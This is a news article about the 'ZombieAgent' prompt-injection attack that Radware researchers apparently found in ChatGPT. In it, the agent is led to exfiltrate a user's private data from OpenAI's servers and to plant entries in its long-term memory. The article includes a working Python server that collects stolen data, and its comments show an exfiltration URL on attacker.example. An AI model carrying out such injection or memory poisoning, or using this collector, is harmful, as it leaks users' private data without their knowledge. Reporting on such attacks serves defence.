ChatGPT falls to new data-pilfering attack as a vicious cycle in AI continues
There’s a well-worn pattern in the development of AI chatbots. Researchers discover a vulnerability and exploit it to do something bad. The platform introduces a guardrail that stops the attack from working. Then, researchers devise a simple tweak that once again imperils chatbot users.
The reason, more often than not, is that AI is so inherently designed to comply with user requests that the guardrails are reactive and ad hoc, built to foreclose a specific attack technique rather than the broader class of vulnerabilities that makes such attacks possible. It’s tantamount to installing a new highway guardrail in response to a recent crash involving a compact car while doing nothing to stop larger vehicles from breaking through.
Enter ZombieAgent, son of ShadowLeak
One of the latest examples is a vulnerability recently discovered in ChatGPT. It allowed researchers at Radware to surreptitiously exfiltrate a user’s private information. Their attack also allowed the data to be sent directly from ChatGPT’s servers, a capability that gave it additional stealth, since there were no signs of a breach on user machines, many of which sit inside protected enterprise networks. Further, the exploit planted entries in the long-term memory that the AI assistant stores for the targeted user, giving the attack persistence.
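To make that server-side exfiltration concrete, here is a minimal sketch of what the attacker’s end could look like. It is our illustration under stated assumptions, not Radware’s actual payload or infrastructure: the hostname, port, and query-parameter name are all hypothetical. The idea is that injected instructions coax the agent into fetching an attacker-controlled URL with the victim’s data tucked into the query string, so the request originates from ChatGPT’s servers rather than the victim’s machine, and the attacker merely has to log whatever arrives.

```python
# Illustrative sketch only; not Radware's code. The host, port, and
# the "d" parameter name are hypothetical. The injected instructions
# would tell the agent to fetch a URL such as
#   http://attacker.example:8080/collect?d=<stolen data>
# so the request comes from ChatGPT's infrastructure, never from the
# victim's machine.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The stolen data arrives as an ordinary query parameter.
        params = parse_qs(urlparse(self.path).query)
        print("exfiltrated:", params.get("d", ["<nothing>"])[0])
        # Answer 200 so the fetch looks like routine web traffic.
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ExfilHandler).serve_forever()
```

Nothing about such a request would trip endpoint defenses, because the victim’s machine never contacts the attacker’s server at all.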